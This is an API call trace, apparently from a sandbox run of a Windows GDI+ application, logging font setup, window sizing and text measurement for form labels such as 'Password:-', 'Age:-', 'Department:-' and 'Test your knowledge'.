[0126.905] CoCreateGuid (in: pguid=0x19d4f4 | out: pguid=0x19d4f4*(Data1=0x70edffd9, Data2=0x3f46, Data3=0x495a, Data4=([0]=0x92, [1]=0x3c, [2]=0x3f, [3]=0x82, [4]=0x28, [5]=0xf8, [6]=0x4, [7]=0x27))) returned 0x0
[0126.955] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.955] GetLastError () returned 0x0
[0126.955] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x2784fdc) returned 0x0
[0126.955] GetLastError () returned 0x0
[0126.955] GdipGetFontSize (font=0x657f700, size=0x2784fe0) returned 0x0
[0126.955] GetLastError () returned 0x0
[0126.955] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.956] GetLastError () returned 0x0
[0126.956] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dd38) returned 0x0
[0126.956] GetLastError () returned 0x0
[0126.956] GdipGetFontHeight (font=0x657f700, graphics=0x657f9c8, height=0x19dd30) returned 0x0
[0126.956] GetLastError () returned 0x0
[0126.956] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.956] GetLastError () returned 0x0
[0126.956] GdipDeleteGraphics (graphics=0x657f9c8) returned 0x0
[0126.956] GetLastError () returned 0x0
[0126.956] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.956] GetLastError () returned 0x0
[0126.956] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.956] GetLastError () returned 0x0
[0126.956] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dccc) returned 0x0
[0126.957] GetLastError () returned 0x0
[0126.957] GdipGetFontHeight (font=0x657f700, graphics=0x657f9c8, height=0x19dcc4) returned 0x0
[0126.957] GetLastError () returned 0x0
[0126.957] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.957] GetLastError () returned 0x0
[0126.957] GdipDeleteGraphics (graphics=0x657f9c8) returned 0x0
[0126.957] GetLastError () returned 0x0
[0126.957] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.957] GetLastError () returned 0x0
[0126.957] GetSystemMetrics (nIndex=5) returned 1
[0126.957] GetSystemMetrics (nIndex=6) returned 1
[0126.957] GetSystemMetrics (nIndex=5) returned 1
[0126.957] GetSystemMetrics (nIndex=6) returned 1
[0126.957] AdjustWindowRectEx (in: lpRect=0x19dc84, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc84) returned 1
[0126.957] GetSystemMetrics (nIndex=5) returned 1
[0126.957] GetSystemMetrics (nIndex=6) returned 1
[0126.957] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.957] GetSystemMetrics (nIndex=5) returned 1
[0126.957] GetSystemMetrics (nIndex=6) returned 1
[0126.958] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.958] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.958] GetLastError () returned 0x0
[0126.958] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x27851e4) returned 0x0
[0126.958] GetLastError () returned 0x0
[0126.958] GdipGetFontSize (font=0x657f8b8, size=0x27851e8) returned 0x0
[0126.958] GetLastError () returned 0x0
[0126.959] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.959] GetLastError () returned 0x0
[0126.959] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dd38) returned 0x0
[0126.959] GetLastError () returned 0x0
[0126.959] GdipGetFontHeight (font=0x657f8b8, graphics=0x657f9c8, height=0x19dd30) returned 0x0
[0126.959] GetLastError () returned 0x0
[0126.959] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.959] GetLastError () returned 0x0
[0126.959] GdipDeleteGraphics (graphics=0x657f9c8) returned 0x0
[0126.959] GetLastError () returned 0x0
[0126.959] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.959] GetLastError () returned 0x0
[0126.959] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.959] GetLastError () returned 0x0
[0126.959] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dccc) returned 0x0
[0126.960] GetLastError () returned 0x0
[0126.960] GdipGetFontHeight (font=0x657f8b8, graphics=0x657f9c8, height=0x19dcc4) returned 0x0
[0126.960] GetLastError () returned 0x0
[0126.960] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.960] GetLastError () returned 0x0
[0126.960] GdipDeleteGraphics (graphics=0x657f9c8) returned 0x0
[0126.960] GetLastError () returned 0x0
[0126.960] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.960] GetLastError () returned 0x0
[0126.960] GetSystemMetrics (nIndex=5) returned 1
[0126.960] GetSystemMetrics (nIndex=6) returned 1
[0126.960] GetSystemMetrics (nIndex=5) returned 1
[0126.960] GetSystemMetrics (nIndex=6) returned 1
[0126.960] AdjustWindowRectEx (in: lpRect=0x19dc84, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc84) returned 1
[0126.960] GetSystemMetrics (nIndex=5) returned 1
[0126.960] GetSystemMetrics (nIndex=6) returned 1
[0126.960] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.960] GetSystemMetrics (nIndex=5) returned 1
[0126.960] GetSystemMetrics (nIndex=6) returned 1
[0126.960] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.974] GdipCreateFontFamilyFromName (name="Postinkantaja Job", fontCollection=0x0, fontFamily=0x19dd5c) returned 0xe
[0126.974] GetLastError () returned 0x0
[0126.974] GdipGetGenericFontFamilySansSerif (nativeFamily=0x19dd4c) returned 0x0
[0126.974] GetLastError () returned 0x0
[0126.974] GdipCreateFont (fontFamily=0x11111111, emSize=0x42100000, style=0, unit=0x3, font=0x278547c) returned 0x0
[0126.974] GetLastError () returned 0x0
[0126.974] GdipGetFontSize (font=0x657f728, size=0x2785480) returned 0x0
[0126.974] GetLastError () returned 0x0
[0126.974] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.974] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.976] GdipCreateFontFamilyFromName (name="Postinkantaja Job", fontCollection=0x0, fontFamily=0x19dd5c) returned 0xe
[0126.976] GetLastError () returned 0x0
[0126.976] GdipGetGenericFontFamilySansSerif (nativeFamily=0x19dd4c) returned 0x0
[0126.976] GetLastError () returned 0x0
[0126.976] GdipCreateFont (fontFamily=0x11111111, emSize=0x42900000, style=0, unit=0x3, font=0x27856cc) returned 0x0
[0126.976] GetLastError () returned 0x0
[0126.976] GdipGetFontSize (font=0x657f908, size=0x27856d0) returned 0x0
[0126.976] GetLastError () returned 0x0
[0126.976] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.976] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.978] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.978] GetLastError () returned 0x0
[0126.978] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x27859c4) returned 0x0
[0126.978] GetLastError () returned 0x0
[0126.978] GdipGetFontSize (font=0x657f778, size=0x27859c8) returned 0x0
[0126.978] GetLastError () returned 0x0
[0126.978] AdjustWindowRectEx (in: lpRect=0x19dd14, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd14) returned 1
[0126.978] AdjustWindowRectEx (in: lpRect=0x19dd14, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd14) returned 1
[0126.980] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.980] GetLastError () returned 0x0
[0126.980] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x2785c84) returned 0x0
[0126.980] GetLastError () returned 0x0
[0126.980] GdipGetFontSize (font=0x657f7a0, size=0x2785c88) returned 0x0
[0126.980] GetLastError () returned 0x0
[0126.980] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.980] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.982] GdipCreateFontFamilyFromName (name="Segoe UI Semibold", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.982] GetLastError () returned 0x0
[0126.982] GdipCreateFont (fontFamily=0x6576ca0, emSize=0x41640000, style=1, unit=0x3, font=0x2785ed4) returned 0x0
[0127.102] GetLastError () returned 0x0
[0127.102] GdipGetFontSize (font=0x657f610, size=0x2785ed8) returned 0x0
[0127.102] GetLastError () returned 0x0
[0127.102] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0127.102] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0127.246] AdjustWindowRectEx (in: lpRect=0x19dd2c, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x19dd2c) returned 1
[0127.254] GetSystemMetrics (nIndex=59) returned 1456
[0127.254] GetSystemMetrics (nIndex=60) returned 916
[0127.255] GetSystemMetrics (nIndex=34) returned 136
[0127.255] GetSystemMetrics (nIndex=35) returned 39
[0127.258] GetSystemMetrics (nIndex=80) returned 1
[0127.260] AdjustWindowRectEx (in: lpRect=0x19dc4c, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x19dc4c) returned 1
[0127.267] GetCurrentThreadId () returned 0x600
[0127.267] GetCurrentThreadId () returned 0x600
[0127.369] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.370] GetLastError () returned 0x0
[0127.413] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x2786234) returned 0x0
[0127.413] GetLastError () returned 0x0
[0127.421] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.423] GetLastError () returned 0x0
[0127.426] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.426] GetLastError () returned 0x0
[0127.427] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.427] GetLastError () returned 0x0
[0127.428] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.428] GetLastError () returned 0x0
[0127.430] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.430] GetLastError () returned 0x0
[0127.458] GdipMeasureString (graphics=0x657fb88, string="All fields are mandatory", length=24, font=0x657f610, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.488] GetLastError () returned 0x0
[0127.489] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.490] GetLastError () returned 0x0
[0127.491] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.491] GetLastError () returned 0x0
[0127.491] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.491] GetLastError () returned 0x0
[0127.491] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.491] GetLastError () returned 0x0
[0127.496] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.565] GetCurrentThreadId () returned 0x600
[0127.566] GetCurrentThreadId () returned 0x600
[0127.566] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.566] GetLastError () returned 0x0
[0127.566] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x2786390) returned 0x0
[0127.566] GetLastError () returned 0x0
[0127.566] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.566] GetLastError () returned 0x0
[0127.566] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.567] GetLastError () returned 0x0
[0127.567] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.567] GetLastError () returned 0x0
[0127.567] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.567] GetLastError () returned 0x0
[0127.567] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.567] GetLastError () returned 0x0
[0127.567] GdipMeasureString (graphics=0x657fb88, string="user", length=4, font=0x657f7a0, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.567] GetLastError () returned 0x0
[0127.567] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.567] GetLastError () returned 0x0
[0127.567] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.567] GetLastError () returned 0x0
[0127.567] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.568] GetLastError () returned 0x0
[0127.568] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.568] GetLastError () returned 0x0
[0127.568] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.568] GetCurrentThreadId () returned 0x600
[0127.568] GetCurrentThreadId () returned 0x600
[0127.568] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.568] GetLastError () returned 0x0
[0127.568] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x27864ec) returned 0x0
[0127.568] GetLastError () returned 0x0
[0127.568] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.568] GetLastError () returned 0x0
[0127.568] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.568] GetLastError () returned 0x0
[0127.568] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.568] GetLastError () returned 0x0
[0127.568] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.569] GetLastError () returned 0x0
[0127.569] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.569] GetLastError () returned 0x0
[0127.569] GdipMeasureString (graphics=0x657fb88, string="Test your knowledge", length=19, font=0x657f728, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.569] GetLastError () returned 0x0
[0127.569] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.569] GetLastError () returned 0x0
[0127.569] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.569] GetLastError () returned 0x0
[0127.569] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.569] GetLastError () returned 0x0
[0127.569] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.569] GetLastError () returned 0x0
[0127.569] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.569] GetCurrentThreadId () returned 0x600
[0127.569] GetCurrentThreadId () returned 0x600
[0127.569] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.570] GetLastError () returned 0x0
[0127.570] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x2786648) returned 0x0
[0127.570] GetLastError () returned 0x0
[0127.570] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.570] GetLastError () returned 0x0
[0127.570] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.570] GetLastError () returned 0x0
[0127.570] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.570] GetLastError () returned 0x0
[0127.570] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.570] GetLastError () returned 0x0
[0127.570] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.570] GetLastError () returned 0x0
[0127.570] GdipMeasureString (graphics=0x657fb88, string="EDu.CroSS", length=9, font=0x657f908, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.570] GetLastError () returned 0x0
[0127.570] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.570] GetLastError () returned 0x0
[0127.570] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.570] GetLastError () returned 0x0
[0127.570] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.570] GetLastError () returned 0x0
[0127.570] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.570] GetLastError () returned 0x0
[0127.570] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.570] GetCurrentThreadId () returned 0x600
[0127.570] GetCurrentThreadId () returned 0x600
[0127.584] GetCurrentThreadId () returned 0x600
[0127.584] GetCurrentThreadId () returned 0x600
[0127.593] GetCurrentThreadId () returned 0x600
[0127.593] GetCurrentThreadId () returned 0x600
[0127.594] GetCurrentThreadId () returned 0x600
[0127.594] GetCurrentThreadId () returned 0x600
[0127.594] GetCurrentThreadId () returned 0x600
[0127.594] GetCurrentThreadId () returned 0x600
[0127.594] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.594] GetLastError () returned 0x0
[0127.594] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x2786a3c) returned 0x0
[0127.594] GetLastError () returned 0x0
[0127.595] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.595] GetLastError () returned 0x0
[0127.595] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.595] GetLastError () returned 0x0
[0127.595] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.595] GetLastError () returned 0x0
[0127.595] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.595] GetLastError () returned 0x0
[0127.595] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.595] GetLastError () returned 0x0
[0127.595] GdipMeasureString (graphics=0x657fb88, string="Gender:-", length=8, font=0x657f890, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.595] GetLastError () returned 0x0
[0127.595] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.595] GetLastError () returned 0x0
[0127.595] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.595] GetLastError () returned 0x0
[0127.595] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.595] GetLastError () returned 0x0
[0127.595] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.595] GetLastError () returned 0x0
[0127.595] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.596] GetCurrentThreadId () returned 0x600
[0127.596] GetCurrentThreadId () returned 0x600
[0127.596] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.596] GetLastError () returned 0x0
[0127.596] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x2786b98) returned 0x0
[0127.596] GetLastError () returned 0x0
[0127.596] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.596] GetLastError () returned 0x0
[0127.596] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.596] GetLastError () returned 0x0
[0127.596] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.596] GetLastError () returned 0x0
[0127.596] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.596] GetLastError () returned 0x0
[0127.596] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.596] GetLastError () returned 0x0
[0127.596] GdipMeasureString (graphics=0x657fb88, string="Age:-", length=5, font=0x657f7f0, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.596] GetLastError () returned 0x0
[0127.596] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.596] GetLastError () returned 0x0
[0127.596] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.596] GetLastError () returned 0x0
[0127.596] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.596] GetLastError () returned 0x0
[0127.597] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.597] GetLastError () returned 0x0
[0127.597] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.597] GetCurrentThreadId () returned 0x600
[0127.597] GetCurrentThreadId () returned 0x600
[0127.597] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.604] GetLastError () returned 0x0
[0127.604] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x2786cf4) returned 0x0
[0127.604] GetLastError () returned 0x0
[0127.604] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.604] GetLastError () returned 0x0
[0127.604] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.604] GetLastError () returned 0x0
[0127.604] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.604] GetLastError () returned 0x0
[0127.605] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.605] GetLastError () returned 0x0
[0127.605] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.605] GetLastError () returned 0x0
[0127.605] GdipMeasureString (graphics=0x657fb88, string="Confirm Password:-", length=18, font=0x657f868, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.605] GetLastError () returned 0x0
[0127.605] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.605] GetLastError () returned 0x0
[0127.605] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.605] GetLastError () returned 0x0
[0127.605] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.605] GetLastError () returned 0x0
[0127.605] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.605] GetLastError () returned 0x0
[0127.605] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.605] GetCurrentThreadId () returned 0x600
[0127.605] GetCurrentThreadId () returned 0x600
[0127.610] GetCurrentThreadId () returned 0x600
[0127.610] GetCurrentThreadId () returned 0x600
[0127.610] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.610] GetLastError () returned 0x0
[0127.610] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x2786e9c) returned 0x0
[0127.610] GetLastError () returned 0x0
[0127.610] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.610] GetLastError () returned 0x0
[0127.610] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.610] GetLastError () returned 0x0
[0127.610] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.610] GetLastError () returned 0x0
[0127.610] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.610] GetLastError () returned 0x0
[0127.610] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.610] GetLastError () returned 0x0
[0127.610] GdipMeasureString (graphics=0x657fb88, string="Password:-", length=10, font=0x657f8e0, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.610] GetLastError () returned 0x0
[0127.611] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.611] GetLastError () returned 0x0
[0127.611] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.611] GetLastError () returned 0x0
[0127.611] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.611] GetLastError () returned 0x0
[0127.611] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.611] GetLastError () returned 0x0
[0127.611] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.611] GetCurrentThreadId () returned 0x600
[0127.611] GetCurrentThreadId () returned 0x600
[0127.611] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.611] GetLastError () returned 0x0
[0127.611] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x2786ff8) returned 0x0
[0127.611] GetLastError () returned 0x0
[0127.611] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.612] GetLastError () returned 0x0
[0127.612] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.612] GetLastError () returned 0x0
[0127.612] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.612] GetLastError () returned 0x0
[0127.612] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.612] GetLastError () returned 0x0
[0127.612] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.612] GetLastError () returned 0x0
[0127.612] GdipMeasureString (graphics=0x657fb88, string="Department:-", length=12, font=0x657f598, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.612] GetLastError () returned 0x0
[0127.612] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.612] GetLastError () returned 0x0
[0127.612] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.612] GetLastError () returned 0x0
[0127.612] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.612] GetLastError () returned 0x0
[0127.612] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.612] GetLastError () returned 0x0
[0127.612] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.612] GetCurrentThreadId () returned 0x600
[0127.612] GetCurrentThreadId () returned 0x600
[0127.612] GetCurrentThreadId () returned 0x600
[0127.612] GetCurrentThreadId () returned 0x600
[0127.612] GetCurrentThreadId () returned 0x600
[0127.612] GetCurrentThreadId () returned 0x600
[0127.613] GetCurrentThreadId () returned 0x600
[0127.613] GetCurrentThreadId () returned 0x600
[0127.613] GetCurrentThreadId () returned 0x600
[0127.613] GetCurrentThreadId () returned 0x600
[0127.613] GetCurrentThreadId () returned 0x600
[0127.613] GetCurrentThreadId () returned 0x600
[0127.613] GetCurrentThreadId () returned 0x600
[0127.613] GetCurrentThreadId () returned 0x600
[0127.614] GetCurrentThreadId () returned 0x600
[0127.614] GetCurrentThreadId () returned 0x600
[0127.614] GetCurrentThreadId () returned 0x600
[0127.614] GetCurrentThreadId () returned 0x600
[0127.614] GetCurrentThreadId () returned 0x600
[0127.614] GetCurrentThreadId () returned 0x600
[0127.614] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.614] GetLastError () returned 0x0
[0127.614] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x2787490) returned 0x0
[0127.614] GetLastError () returned 0x0
[0127.614] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.614] GetLastError () returned 0x0
[0127.614] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.614] GetLastError () returned 0x0
